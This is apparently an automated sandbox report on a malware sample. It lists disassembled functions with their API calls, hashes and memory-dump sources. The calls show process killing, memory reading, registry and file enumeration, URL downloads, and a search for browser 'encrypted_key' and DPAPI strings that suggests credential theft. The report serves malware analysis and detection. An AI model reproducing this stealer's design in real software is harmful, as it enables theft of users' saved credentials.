Opcode Fuzzy Hash: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
Instruction Fuzzy Hash: FB415C70A00605AFDB24CF54DD88B9BB7B5FF48304F14806AE909AB3D1D7759941CFA8

Function 00834BB7 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00834BD0
Process32First.KERNEL32(00000000,00000128), ref: 00834BE0
Process32Next.KERNEL32(00000000,00000128), ref: 00834BF2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00834C13
TerminateProcess.KERNEL32(00000000,00000000), ref: 00834C22
CloseHandle.KERNEL32(00000000), ref: 00834C29
Process32Next.KERNEL32(00000000,00000128), ref: 00834C37
CloseHandle.KERNEL32(00000000), ref: 00834C42

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 0cb0fb5ab062b717aee641f90cb52898b25a77e3209c7b73d4a218807217ae24
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 550192716422146FE7215B609C89FEA777DFB48751F003188F949D2191DFB0DD808AE0

Function 00424950 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424969
Process32First.KERNEL32(00000000,00000128), ref: 00424979
Process32Next.KERNEL32(00000000,00000128), ref: 0042498B
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004249AC
TerminateProcess.KERNEL32(00000000,00000000), ref: 004249BB
CloseHandle.KERNEL32(00000000), ref: 004249C2
Process32Next.KERNEL32(00000000,00000128), ref: 004249D0
CloseHandle.KERNEL32(00000000), ref: 004249DB

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 1dcc0a632c58819bc0603b9dca4f2ab71f075bb114674fc9a8b609d01bacb988
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 860180B1601224ABE7215B70AC89FEB776DEB48751F00118AF909D2290DFB49D908EA4

Function 0081E5CA Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0081E92C
lstrcpy.KERNEL32(00000000,?), ref: 0081E955
lstrcpy.KERNEL32(00000000,?), ref: 0081E98E
lstrcpy.KERNEL32(00000000,?), ref: 0081E9B4
lstrcpy.KERNEL32(00000000,?), ref: 0081E9EB
FindNextFileA.KERNEL32(00000000,?), ref: 0081EA21
FindClose.KERNEL32(00000000), ref: 0081EA30

Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117BE
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117E0
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811802
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811866

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
Instruction ID: 8c1d88cad61b52dd4cb958ddf7ab6d53651f7dfe6f291a40c0c3d97b4df18859
Opcode Fuzzy Hash: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
Instruction Fuzzy Hash: FB02DB70A112158FDB68CF19D584AA5B7E9FF44724B19C1ADD809DB3A2D772EC82CF80

Function 0081E564 Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0081E92C
lstrcpy.KERNEL32(00000000,?), ref: 0081E955
lstrcpy.KERNEL32(00000000,?), ref: 0081E98E
lstrcpy.KERNEL32(00000000,?), ref: 0081E9B4
lstrcpy.KERNEL32(00000000,?), ref: 0081E9EB
FindNextFileA.KERNEL32(00000000,?), ref: 0081EA21
FindClose.KERNEL32(00000000), ref: 0081EA30

Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117BE
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117E0
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811802
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811866

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
Instruction ID: 8c1d88cad61b52dd4cb958ddf7ab6d53651f7dfe6f291a40c0c3d97b4df18859
Opcode Fuzzy Hash: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
Instruction Fuzzy Hash: FB02DB70A112158FDB68CF19D584AA5B7E9FF44724B19C1ADD809DB3A2D772EC82CF80

Function 0081E611 Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0081E92C
lstrcpy.KERNEL32(00000000,?), ref: 0081E955
lstrcpy.KERNEL32(00000000,?), ref: 0081E98E
lstrcpy.KERNEL32(00000000,?), ref: 0081E9B4
lstrcpy.KERNEL32(00000000,?), ref: 0081E9EB
FindNextFileA.KERNEL32(00000000,?), ref: 0081EA21
FindClose.KERNEL32(00000000), ref: 0081EA30

Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117BE
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117E0
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811802
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811866

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
Instruction ID: 8c1d88cad61b52dd4cb958ddf7ab6d53651f7dfe6f291a40c0c3d97b4df18859
Opcode Fuzzy Hash: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
Instruction Fuzzy Hash: FB02DB70A112158FDB68CF19D584AA5B7E9FF44724B19C1ADD809DB3A2D772EC82CF80

Function 008325C7 Relevance: 10.7, APIs: 7, Instructions: 224stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 008325DA
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,008328D6,00000000,00000000,00000000), ref: 00832608
VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 00832658
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 008326B9

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtualstrlen
String ID:
API String ID: 3366127311-0
Opcode ID: 166c814b01d8e004447cfcd84c513d1013a0296324ad5aeb6ffc442a86390311
Instruction ID: 1808fed84cb0b38087aff5ee1643891e22f634f46d5e55eb0a4d57bf35e32dfb
Opcode Fuzzy Hash: 166c814b01d8e004447cfcd84c513d1013a0296324ad5aeb6ffc442a86390311
Instruction Fuzzy Hash: A6718171A001199BDF14CFA8D885AAEB7B6FFD8710F248539E915E7290E734ED418BE0

Function 0081A047 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0081A0D6
LocalAlloc.KERNEL32(00000040), ref: 0081A10E

Part of subcall function 00837657: lstrcpy.KERNEL32(00000000,ERROR), ref: 00837675

lstrcpy.KERNEL32(00000000,00431C78), ref: 0081A219

Strings

@, xrefs: 0081A0EF
DLC, xrefs: 0081A194
HLC, xrefs: 0081A1BA

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocalmemset
String ID: @$DLC$HLC
API String ID: 4098468873-1894397651
Opcode ID: 28df94bb4e13c356da6d3a4539f0d522cc80f25dc8dde00f5521364257e190a1
Instruction ID: af8dfb3df70e38e2026dfede08e9096da117980fedad7f499534dab763981ca4
Opcode Fuzzy Hash: 28df94bb4e13c356da6d3a4539f0d522cc80f25dc8dde00f5521364257e190a1
Instruction Fuzzy Hash: E251AAB1A00249ABDB14EF68CC85ADD77A8FF50318F114025FA09EB251EB74ED94CBD2

Function 00817457 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 008174A5
GetProcessHeap.KERNEL32(00000008,00000010), ref: 008174E0
RtlAllocateHeap.NTDLL(00000000), ref: 008174E7
memcpy.MSVCRT(00000000,?), ref: 00817514
GetProcessHeap.KERNEL32(00000000,?), ref: 0081752A
HeapFree.KERNEL32(00000000), ref: 00817531
GetProcAddress.KERNEL32(00000000,?), ref: 00817590

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
String ID:
API String ID: 413393563-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 2837b376a981e249b133ebb8596665e8d793b4b6f7ca040d712d04507d59df7a
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: 36414A71B046059BDB20CF69D884BEAB7FAFF88305F1445ADE84AC7310E771E9408B90

Function 004071F0 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0040723E
GetProcessHeap.KERNEL32(00000008,00000010), ref: 00407279
HeapAlloc.KERNEL32(00000000), ref: 00407280
memcpy.MSVCRT(00000000,?), ref: 004072AD
GetProcessHeap.KERNEL32(00000000,?), ref: 004072C3
HeapFree.KERNEL32(00000000), ref: 004072CA
GetProcAddress.KERNEL32(00000000,?), ref: 00407329

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
String ID:
API String ID: 1745114167-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 5c04f978e963cdea92a01edc1f3ad230323f660b4d2968f88ba47752cd35672e
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: 35416B71B046069BEB20CF69DC84BAAB3E9FB84305F1445BAEC49D7380E635F900DB65

Function 00409C70 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00409CA8
LocalAlloc.KERNEL32(00000040,?), ref: 00409CDA
StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D03
memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D3C

Strings

, xrefs: 00409D65
DPAPI, xrefs: 00409D36
"encrypted_key":", xrefs: 00409CFD

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID: $"encrypted_key":"$DPAPI
API String ID: 4154055062-738592651
Opcode ID: de49318a60686ef87c7100295f141fc04b56974eb2f18f98bd233850a9984601
Instruction ID: 6c8d556d21e19e5d3b0639c321864ed51762282b360f53d65d825accd8ba46b4
Opcode Fuzzy Hash: de49318a60686ef87c7100295f141fc04b56974eb2f18f98bd233850a9984601
Instruction Fuzzy Hash: 48418E31B0020A9BDB21EF69DD456AF77B4AF44308F04407AED15B72E3DA78AD04CB98

Function 008158A7 Relevance: 10.6, APIs: 7, Instructions: 112networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008158C1
RtlAllocateHeap.NTDLL(00000000), ref: 008158C8
InternetOpenA.WININET(0042CFF4,00000000,00000000,00000000,00000000), ref: 008158DE
InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 008158F9
InternetReadFile.WININET(?,?,00000400,00000001), ref: 00815923
InternetCloseHandle.WININET(?), ref: 00815961
InternetCloseHandle.WININET(00000000), ref: 00815968

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
Instruction ID: ea7faaf6b0916aeb67aeaa10107f467c74f8569b9a52c762378b5b25502d3df8
Opcode Fuzzy Hash: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
Instruction Fuzzy Hash: 43418C70A00305EFDB24CF54DC88B9ABBB9FF88714F148069E909DB291E7719981CFA5

Function 008283F7 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0082841C
lstrlen.KERNEL32(00000000), ref: 00828462
lstrcpy.KERNEL32(00000000,00000000), ref: 00828491
StrCmpCA.SHLWAPI(00000000,00434C44), ref: 008284A9
lstrlen.KERNEL32(00000000), ref: 008284E7
lstrcpy.KERNEL32(00000000,00000000), ref: 00828516
strtok_s.MSVCRT ref: 00828526

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 1bc2e37c1a21135defa26a9ed81cbec90adad79c8ff921a3e68a1739e3be9e3d
Instruction ID: 425ba30787d2ce5e4b2a0d550be9d823d1d85b7263240ff3eb70b369b53f3faa
Opcode Fuzzy Hash: 1bc2e37c1a21135defa26a9ed81cbec90adad79c8ff921a3e68a1739e3be9e3d
Instruction Fuzzy Hash: EC418C75601216DBDB21EF6CEA44BAABBF8FF44700F108019E849D7245EB34D991CB90

Function 00418190 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004181B5
lstrlenA.KERNEL32(00000000), ref: 004181FB
lstrcpy.KERNEL32(00000000,00000000), ref: 0041822A
StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418242
lstrlenA.KERNEL32(00000000), ref: 00418280
lstrcpy.KERNEL32(00000000,00000000), ref: 004182AF
strtok_s.MSVCRT ref: 004182BF

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: f24fc9eefc99e19dcbc4e22a9e0d3368406ff9ef199c0fb47bd4df24d4a4a093
Instruction ID: 44e3f82219f4b5846f9302bf287b5fdcc788e1807cf968ce595ad677923a09cd
Opcode Fuzzy Hash: f24fc9eefc99e19dcbc4e22a9e0d3368406ff9ef199c0fb47bd4df24d4a4a093
Instruction Fuzzy Hash: D4417E756006069FCB22DF68DA48BABBBB4EF44700F10416EAC49D7344EB78D981CB99

Function 00834977 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00834991
GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00825300), ref: 008349BC
RtlAllocateHeap.NTDLL(00000000), ref: 008349C3
wsprintfW.USER32 ref: 008349D2
OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00834A41
TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00834A50
CloseHandle.KERNEL32(00000000,?,?), ref: 00834A57

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: b40a05e5e8963302e6200acf2760106db9db520d9f916005feac94bb0399dcc9
Instruction ID: f4ad9c60083cafbab22384982b22033782194903662244421109273b65bf992e
Opcode Fuzzy Hash: b40a05e5e8963302e6200acf2760106db9db520d9f916005feac94bb0399dcc9
Instruction Fuzzy Hash: AA317E71A40219ABDB20DBE4DC85FDEB779FF85740F105059FA05E7180EBB4AA408BE9

Function 00417E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417E98

Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA

std::_Xinvalid_argument.LIBCPMT ref: 00417EB6
std::_Xinvalid_argument.LIBCPMT ref: 00417ED1
memcpy.MSVCRT(?,?,?,00000000,?,?,00417DBA,00000000,?,?,00000000,?,00409186,?), ref: 00417F34

Strings

string too long, xrefs: 00417EB1, 00417ECC
invalid string position, xrefs: 00417E93

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
String ID: invalid string position$string too long
API String ID: 702443124-4289949731
Opcode ID: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
Instruction ID: 76ed7461fbfc9217e49c2ea02518e7ea48320d37208f920ac55b1611293e244f
Opcode Fuzzy Hash: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
Instruction Fuzzy Hash: ED2193313083008BD724DE2CE880A6BB7F5AB95714B204A6FF5968B781D779DC858769

Function 00833567 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0083359D
RtlAllocateHeap.NTDLL(00000000), ref: 008335A4
RegOpenKeyExA.ADVAPI32(80000002,006389D4,00000000,00020119,?), ref: 008335C3
RegQueryValueExA.ADVAPI32(?,00638CEC,00000000,00000000,00000000,000000FF), ref: 008335DE
RegCloseKey.ADVAPI32(?), ref: 008335E8

Strings

@LC, xrefs: 0083360E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: @LC
API String ID: 3225020163-1019364593
Opcode ID: 63cd5e542e97fe48a5e47f7dd46fa8fe3d447d278064c6fe1a079585c42b52a7
Instruction ID: b1f3f4f211c7aa29db9fc515710285d10e6bf982ee958f81e83ed5503bc34182
Opcode Fuzzy Hash: 63cd5e542e97fe48a5e47f7dd46fa8fe3d447d278064c6fe1a079585c42b52a7
Instruction Fuzzy Hash: 28118272A44204AFD714CB95EC46FABBB7DFB88711F10411AFA05D3380DB7459048BE1

Function 00422AE0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422AF5
HeapAlloc.KERNEL32(00000000), ref: 00422AFC
RegOpenKeyExA.ADVAPI32(80000002,0090C250,00000000,00020119,00422A79), ref: 00422B1B
RegQueryValueExA.ADVAPI32(00422A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422B35
RegCloseKey.ADVAPI32(00422A79), ref: 00422B3F

Strings

CurrentBuildNumber, xrefs: 00422B2F

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: eedc4f5b1c834951d409d8a86460196dbdad40995e2cb2646183cc9f75c04971
Instruction ID: e4efa8e5db0ad91907f3ecacc4057bf76477b8c471b957b80fd295e858fd28ec
Opcode Fuzzy Hash: eedc4f5b1c834951d409d8a86460196dbdad40995e2cb2646183cc9f75c04971
Instruction Fuzzy Hash: 43019E75A00318BFD314DFA0AC59FEB7BB9AB48741F100099FE4597241EAB169048BA0

Function 00832CB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00832CCC
RtlAllocateHeap.NTDLL(00000000), ref: 00832CD3

Part of subcall function 00832D47: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00832D5C
Part of subcall function 00832D47: RtlAllocateHeap.NTDLL(00000000), ref: 00832D63
Part of subcall function 00832D47: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,00832CE0), ref: 00832D82
Part of subcall function 00832D47: RegQueryValueExA.ADVAPI32(00832CE0,0043509C,00000000,00000000,00000000,000000FF), ref: 00832D9C
Part of subcall function 00832D47: RegCloseKey.ADVAPI32(00832CE0), ref: 00832DA6

RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,008298B7), ref: 00832D08
RegQueryValueExA.ADVAPI32(008298B7,00638C34,00000000,00000000,00000000,000000FF), ref: 00832D23
RegCloseKey.ADVAPI32(008298B7), ref: 00832D2D

Strings

Windows 11, xrefs: 00832CE7

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
Instruction ID: b4e39eeacf8c5b7729777f99a3266c0872dd0392501a32e75967f7e953a29754
Opcode Fuzzy Hash: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
Instruction Fuzzy Hash: 7E01ADB5600308BFDB14DBA4EC49EEA7B7EEB84715F001159FE09D7290DAB09A448BE0

Function 00422A50 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422A65
HeapAlloc.KERNEL32(00000000), ref: 00422A6C

Part of subcall function 00422AE0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422AF5
Part of subcall function 00422AE0: HeapAlloc.KERNEL32(00000000), ref: 00422AFC
Part of subcall function 00422AE0: RegOpenKeyExA.ADVAPI32(80000002,0090C250,00000000,00020119,00422A79), ref: 00422B1B
Part of subcall function 00422AE0: RegQueryValueExA.ADVAPI32(00422A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422B35
Part of subcall function 00422AE0: RegCloseKey.ADVAPI32(00422A79), ref: 00422B3F

RegOpenKeyExA.ADVAPI32(80000002,0090C250,00000000,00020119,00419650), ref: 00422AA1
